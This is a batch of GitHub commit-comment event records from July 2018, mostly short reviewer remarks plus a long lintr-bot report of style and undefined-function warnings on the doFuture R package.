{"id":"7998158047","type":"CommitCommentEvent","actor":{"login":"Hersmunch"},"repo":{"name":"gcp/leela-zero"},"payload":{"comment":{"id":29787527,"position":5,"line":522,"path":"src/OpenCL.cpp","commit_id":"0291223843ba81cd6fe162a702da336e57762baf","created_at":"2018-07-21T06:49:48Z","updated_at":"2018-07-21T06:49:48Z","author_association":"CONTRIBUTOR","body":"Similar changes for input"}},"created_at":"2018-07-21T06:49:48Z"}
{"id":"7998158210","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"HenrikBengtsson/doFuture"},"payload":{"comment":{"id":29787528,"position":null,"line":null,"path":null,"commit_id":"b97a3be7841eee27dee08d6800ecddc43ced10c3","created_at":"2018-07-21T06:50:00Z","updated_at":"2018-07-21T06:50:00Z","author_association":"NONE","body":"[inst/tests2/caret/examples.R:3:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/caret/examples.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​install_missing_packages(c(\"class\", \"cluster\", \"lattice\", \"MASS\", \"Matrix\", \"nlme\", \"nnet\", \"rpart\", \"survival\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:15:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L15) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[inst/tests2/incl/utils.R:36:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:41:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L41) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:45:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:49:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L49) *style:* **Lines should not be more than 80 characters.**\n```r\n​run_examples <- function(package, topics = test_topics(package), strategy, ...) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:55:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L55) *warning:* **no visible global function definition for ‘registerDoFuture’**\n```r\n​    registerDoFuture()\n    ^~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:56:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L56) *warning:* **no visible global function definition for ‘plan’, Did you mean 'lag'?**\n```r\n​    plan(strategy)\n    ^~~~\n```\n[inst/tests2/incl/utils.R:57:11:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L57) *warning:* **no visible global function definition for ‘run_example’**\n```r\n​    dt <- run_example(topic = topic, package = package, ...)\n          ^~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:81:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L81) *style:* **Lines should not be more than 80 characters.**\n```r\n​install_missing_packages <- function(pkgs, bioc = FALSE, repos = \"https://cloud.r-project.org\") {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:84:7:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L84) *style:* **Variable or function name should be snake_case.**\n```r\n​      .biocLite <- NULL\n      ^~~~~~~~~\n```\n[inst/tests2/incl/utils.R:88:11:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L88) *style:* **Variable or function name should be snake_case.**\n```r\n​          .biocLite <<- biocLite\n          ^~~~~~~~~\n```\n[inst/tests2/incl/utils.R:88:12:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L88) *warning:* **no visible binding for global variable ‘biocLite’**\n```r\n​          .biocLite <<- biocLite\n           ^~~~~~~~\n```\n[inst/tests2/incl/utils.R:125:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L125) *warning:* **no visible global function definition for ‘mprintf’, Did you mean 'sprintf'?**\n```r\n​  mprintf(\"Library path: %s\", paste(sQuote(.libPaths()), collapse = \", \"))\n  ^~~~~~~\n```\n[inst/tests2/incl/utils.R:128:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L128) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:132:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L132) *warning:* **no visible global function definition for ‘mprintf’, Did you mean 'sprintf'?**\n```r\n​    mprintf(\"- Installing package: %s\", pkg)\n    ^~~~~~~\n```\n[inst/tests2/incl/utils.R:150:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L150) *warning:* **no visible global function definition for ‘install_missing_packages’**\n```r\n​    install_missing_packages(\"future.BatchJobs\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:154:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L154) *warning:* **no visible global function definition for ‘install_missing_packages’**\n```r\n​    install_missing_packages(\"future.batchtools\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:163:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L163) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:179:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L179) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[inst/tests2/incl/utils.R:180:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L180) *style:* **Lines should not be more than 80 characters.**\n```r\n​        mprintf(\"- Library path: %s\", paste(sQuote(.libPaths()), collapse = \", \"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:183:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L183) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:189:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L189) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[inst/tests2/incl/utils.R:193:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/incl/utils.R#L193) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/tests2/NMF/manual.R:29:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/inst/tests2/NMF/manual.R#L29) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:10:14:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L10) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"doFuture() ...\")\n             ^~~~~~\n```\n[R/doFuture.R:16:9:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L16) *warning:* **no visible global function definition for ‘iter’, Did you mean 'it'?**\n```r\n​  it <- iter(obj)\n        ^~~~\n```\n[R/doFuture.R:18:18:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L18) *warning:* **no visible global function definition for ‘makeAccum’**\n```r\n​  accumulator <- makeAccum(it)\n                 ^~~~~~~~~\n```\n[R/doFuture.R:106:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L106) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"- R expression:\")\n    ^~~~~~\n```\n[R/doFuture.R:107:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L107) *warning:* **no visible global function definition for ‘mprint’, Did you mean 'print'?**\n```r\n​    mprint(expr)\n    ^~~~~~\n```\n[R/doFuture.R:115:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L115) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"- identifying globals and packages ...\")\n    ^~~~~~\n```\n[R/doFuture.R:137:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L137) *style:* **Lines should not be more than 80 characters.**\n```r\n​        warning(sprintf(\"Detected a foreach(..., .export = c(%s)) call where '.export' might lack one or more variables (of which some might be false positives): %s\", paste(dQuote(globals2), collapse = \", \"), paste(dQuote(missing), collapse = \", \")))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/doFuture.R:140:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L140) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/doFuture.R:155:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L155) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:161:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L161) *warning:* **no visible global function definition for ‘mstr’, Did you mean 'str'?**\n```r\n​    mstr(globals)\n    ^~~~\n```\n[R/doFuture.R:164:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L164) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"  - R expression:\")\n    ^~~~~~\n```\n[R/doFuture.R:165:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L165) *warning:* **no visible global function definition for ‘mprint’, Did you mean 'print'?**\n```r\n​    mprint(expr)\n    ^~~~~~\n```\n[R/doFuture.R:166:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L166) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"- identifying globals and packages ... DONE\")\n    ^~~~~~\n```\n[R/doFuture.R:173:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L173) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:211:25:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L211) *warning:* **no visible global function definition for ‘nbrOfWorkers’**\n```r\n​      nbr_of_futures <- nbrOfWorkers()\n                        ^~~~~~~~~~~~\n```\n[R/doFuture.R:219:23:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L219) *warning:* **no visible global function definition for ‘nbrOfWorkers’**\n```r\n​    nbr_of_workers <- nbrOfWorkers()\n                      ^~~~~~~~~~~~\n```\n[R/doFuture.R:232:13:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L232) *warning:* **no visible global function definition for ‘splitIndices’**\n```r\n​  chunks <- splitIndices(nbr_of_elements, ncl = nbr_of_futures)\n            ^~~~~~~~~~~~\n```\n[R/doFuture.R:233:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L233) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  mdebug(\"Number of chunks: %d\", length(chunks))\n  ^~~~~~\n```\n[R/doFuture.R:241:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L241) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  mdebug(\"Number of futures (= number of chunks): %d\", nchunks)\n  ^~~~~~\n```\n[R/doFuture.R:243:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L243) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  mdebug(\"Launching %d futures (chunks) ...\", nchunks)\n  ^~~~~~\n```\n[R/doFuture.R:246:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L246) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"Chunk #%d of %d ...\", ii, length(chunks))\n    ^~~~~~\n```\n[R/doFuture.R:260:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L260) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"Chunk #%d of %d ... DONE\", ii, nchunks)\n    ^~~~~~\n```\n[R/doFuture.R:263:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L263) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  mdebug(\"Launching %d futures (chunks) ... DONE\", nchunks)\n  ^~~~~~\n```\n[R/doFuture.R:271:14:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L271) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- resolving futures\")\n             ^~~~~~\n```\n[R/doFuture.R:272:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L272) *warning:* **no visible global function definition for ‘resolve’, Did you mean 'qr.solve'?**\n```r\n​  resolve(fs, value = TRUE)\n  ^~~~~~~\n```\n[R/doFuture.R:275:14:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L275) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- collecting values of future\")\n             ^~~~~~\n```\n[R/doFuture.R:276:31:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L276) *warning:* **no visible binding for global variable ‘value’**\n```r\n​  results <- lapply(fs, FUN = value, signal = FALSE)\n                              ^~~~~\n```\n[R/doFuture.R:286:14:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L286) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- accumulating results\")\n             ^~~~~~\n```\n[R/doFuture.R:304:5:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L304) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"- processing errors (handler = %s)\", sQuote(error_handling))\n    ^~~~~~\n```\n[R/doFuture.R:306:18:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L306) *warning:* **no visible global function definition for ‘getErrorValue’**\n```r\n​  error_value <- getErrorValue(it)\n                 ^~~~~~~~~~~~~\n```\n[R/doFuture.R:308:20:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L308) *warning:* **no visible global function definition for ‘getErrorIndex’**\n```r\n​    error_index <- getErrorIndex(it)\n                   ^~~~~~~~~~~~~\n```\n[R/doFuture.R:319:14:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L319) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- extracting results\")\n             ^~~~~~\n```\n[R/doFuture.R:320:10:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L320) *warning:* **no visible global function definition for ‘getResult’**\n```r\n​  res <- getResult(it)\n         ^~~~~~~~~\n```\n[R/doFuture.R:322:14:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/doFuture.R#L322) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"doFuture() ... DONE\")\n             ^~~~~~\n```\n[R/options.R:1:40:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/options.R#L1) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' Options used by the doFuture adaptor \n                                       ^\n```\n[R/options.R:18:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/options.R#L18) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/options.R:21:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/options.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/options.R:24:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/options.R#L24) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/options.R:27:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/options.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/options.R:30:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/options.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/options.R:35:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/options.R#L35) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/options.R:41:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/options.R#L41) *style:* **Lines should not be more than 80 characters.**\n```r\n​#'  \\item{\\option{doFuture.debug}:}{If \\code{TRUE}, extensive debug messages are generated. (Default: \\code{FALSE})}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/registerDoFuture.R:22:3:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/registerDoFuture.R#L22) *warning:* **no visible global function definition for ‘setDoPar’**\n```r\n​  setDoPar(doFuture, data = NULL, info = info)\n  ^~~~~~~~\n```\n[R/registerDoFuture.R:22:12:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/R/registerDoFuture.R#L22) *warning:* **no visible binding for global variable ‘doFuture’**\n```r\n​  setDoPar(doFuture, data = NULL, info = info)\n           ^~~~~~~~\n```\n[tests/foreach,globals.R:14:1:](https://github.com/HenrikBengtsson/doFuture/blob/b97a3be7841eee27dee08d6800ecddc43ced10c3/tests/foreach,globals.R#L14) *style:* **Variable or function name should be snake_case.**\n```r\n​X <- matrix(1:4, nrow = 3L, ncol = 4L)\n^\n```"}},"created_at":"2018-07-21T06:50:00Z"}
{"id":"7998159242","type":"CommitCommentEvent","actor":{"login":"MatildaXXX"},"repo":{"name":"MatildaXXX/stock_display_2018.07.20"},"payload":{"comment":{"id":29787530,"position":null,"line":null,"path":null,"commit_id":"2e4375d54aa70e51c9d6a103972a23ad565b3201","created_at":"2018-07-21T06:50:58Z","updated_at":"2018-07-21T06:50:58Z","author_association":"OWNER","body":"宠物图片爬取"}},"created_at":"2018-07-21T06:50:58Z"}
{"id":"7998159493","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29787531,"position":null,"line":null,"path":null,"commit_id":"005f9693e9eec60a9cc34f5a84de82604bcf7fa5","created_at":"2018-07-21T06:51:12Z","updated_at":"2018-07-21T06:51:12Z","author_association":"NONE","body":"Nice! "}},"created_at":"2018-07-21T06:51:12Z"}
{"id":"7998161220","type":"CommitCommentEvent","actor":{"login":"Globik"},"repo":{"name":"rafaelsagastume/postgresql_use_libpq"},"payload":{"comment":{"id":29787540,"position":null,"line":null,"path":null,"commit_id":"5b43087ae3d9c73ecb80aca7a2acc28c5fed2cc8","created_at":"2018-07-21T06:52:51Z","updated_at":"2018-07-21T06:52:51Z","author_association":"NONE","body":"It would be nice to see fully asynchronous behavor."}},"created_at":"2018-07-21T06:52:51Z"}
{"id":"7998161369","type":"CommitCommentEvent","actor":{"login":"fabiosperotto"},"repo":{"name":"educagit/conceitos-basicos-AlexWaskow"},"payload":{"comment":{"id":29787541,"position":null,"line":null,"path":null,"commit_id":"2617d992fc64842aac8084978bd2ae3d32c026c5","created_at":"2018-07-21T06:52:58Z","updated_at":"2018-07-21T06:52:58Z","author_association":"CONTRIBUTOR","body":"É para você seguir o que está na descrição do INSTRUCTIONS.md, já está\ncriado, agora precisa dar um clone no repositório para que você execute\naquelas tarefas na sua máquina, qualquer coisa conversamos na aula.\n\nEm 20 de julho de 2018 21:40, Alex Nunes Waskow <notifications@github.com>\nescreveu:\n\n> Boa noite professor, não entendi algumas etapas, e não consegui falar com\n> os colegas, eu tenho que criar um repositório? Posso dar qualquer nome pra\n> esse repositório? Os arquivos devem ser criados dentro de alguma pasta\n> específica no repositório?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/educagit/conceitos-basicos-AlexWaskow/commit/2617d992fc64842aac8084978bd2ae3d32c026c5#commitcomment-29786245>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAu74FiNa4SsUB8GKfukn2YjY0lNCxxVks5uInhhgaJpZM4VZa88>\n> .\n>\n\n\n\n-- \nFabio Aiub Sperotto\nProfessor - IFSul\nLattes: http://lattes.cnpq.br/5891444821920038\nSite: https://www.fabiosp.com\ndf\n"}},"created_at":"2018-07-21T06:52:58Z"}
{"id":"7998164629","type":"CommitCommentEvent","actor":{"login":"badal0511"},"repo":{"name":"badal0511/hello-world"},"payload":{"comment":{"id":29787545,"position":null,"line":null,"path":null,"commit_id":"e1963485c6e51303b4b7fdfb2010ec6f9d8d8b37","created_at":"2018-07-21T06:55:57Z","updated_at":"2018-07-21T06:55:57Z","author_association":"OWNER","body":"ADD THIS"}},"created_at":"2018-07-21T06:55:57Z"}
{"id":"7998165038","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29787547,"position":null,"line":null,"path":null,"commit_id":"1685da5efdc5475fc628897026a6a0bd69cb0b65","created_at":"2018-07-21T06:56:19Z","updated_at":"2018-07-21T06:56:19Z","author_association":"COLLABORATOR","body":"@Henry2o1o: \"Desktop wäre doch ok?\"\r\n\r\nIm englischen string heißt es Home Screen, also dann hier Startbildschirm (wie sonst auch immer)."}},"created_at":"2018-07-21T06:56:19Z"}
{"id":"7998165346","type":"CommitCommentEvent","actor":{"login":"ynarendarreddy"},"repo":{"name":"ynarendarreddy/devops"},"payload":{"comment":{"id":29787550,"position":null,"line":null,"path":null,"commit_id":"450d55e2aa44a557ec754f1efbd352c3b7150306","created_at":"2018-07-21T06:56:37Z","updated_at":"2018-07-21T06:56:37Z","author_association":"OWNER","body":"thanks"}},"created_at":"2018-07-21T06:56:37Z"}
{"id":"7998165813","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29787554,"position":null,"line":null,"path":null,"commit_id":"005f9693e9eec60a9cc34f5a84de82604bcf7fa5","created_at":"2018-07-21T06:57:06Z","updated_at":"2018-07-21T06:57:06Z","author_association":"NONE","body":"This is good. Congrats!"}},"created_at":"2018-07-21T06:57:06Z"}
{"id":"7998166555","type":"CommitCommentEvent","actor":{"login":"dahlstrom-g"},"repo":{"name":"JetBrains/android"},"payload":{"comment":{"id":29787555,"position":5,"line":113,"path":"android/src/com/android/tools/idea/gradle/project/sync/GradleFiles.java","commit_id":"eca2e4cdc845bcba0c37403b00506344db617c9a","created_at":"2018-07-21T06:57:51Z","updated_at":"2018-07-21T06:57:51Z","author_association":"CONTRIBUTOR","body":"The commit message states, “do not run updateFileHashes on default project”, but it looks like the effect of this change is never to run updateFileHashes, default project or otherwise. Is that intended? What's the thinking behind this?"}},"created_at":"2018-07-21T06:57:51Z"}
{"id":"7998171102","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":29787579,"position":null,"line":null,"path":null,"commit_id":"045b78b824c82eef46c285b6bc800d9c97917f23","created_at":"2018-07-21T07:01:41Z","updated_at":"2018-07-21T07:01:41Z","author_association":"NONE","body":"Repo"}},"created_at":"2018-07-21T07:01:41Z"}
{"id":"7998171591","type":"CommitCommentEvent","actor":{"login":"MGIkemen"},"repo":{"name":"rndomhack/px-downloader"},"payload":{"comment":{"id":29787581,"position":null,"line":null,"path":null,"commit_id":"cb9f6b6d56445487083da1aefb70a861090f701e","created_at":"2018-07-21T07:02:05Z","updated_at":"2018-07-21T07:02:05Z","author_association":"NONE","body":"こんにちは！このChromeアプリの利用者です。以前はAnk Pixiv Toolの利用者ので、あのアプリのワークの情報セーブの機能が好きでした。今はこのアプリもあの機能を追加した、このファイルに書きましょうか？"}},"created_at":"2018-07-21T07:02:05Z"}
{"id":"7998173159","type":"CommitCommentEvent","actor":{"login":"srivasthavasharma"},"repo":{"name":"srivasthavasharma/twitter"},"payload":{"comment":{"id":29787583,"position":null,"line":null,"path":null,"commit_id":"e49dbdc0ea121cba7ac376f3aab2373d4d8616f0","created_at":"2018-07-21T07:03:24Z","updated_at":"2018-07-21T07:03:24Z","author_association":"OWNER","body":"\r\n[twitter.zip](https://github.com/srivasthavasharma/twitter/files/2215953/twitter.zip)\r\n[twitter.zip](https://github.com/srivasthavasharma/twitter/files/2215954/twitter.zip)\r\n"}},"created_at":"2018-07-21T07:03:24Z"}
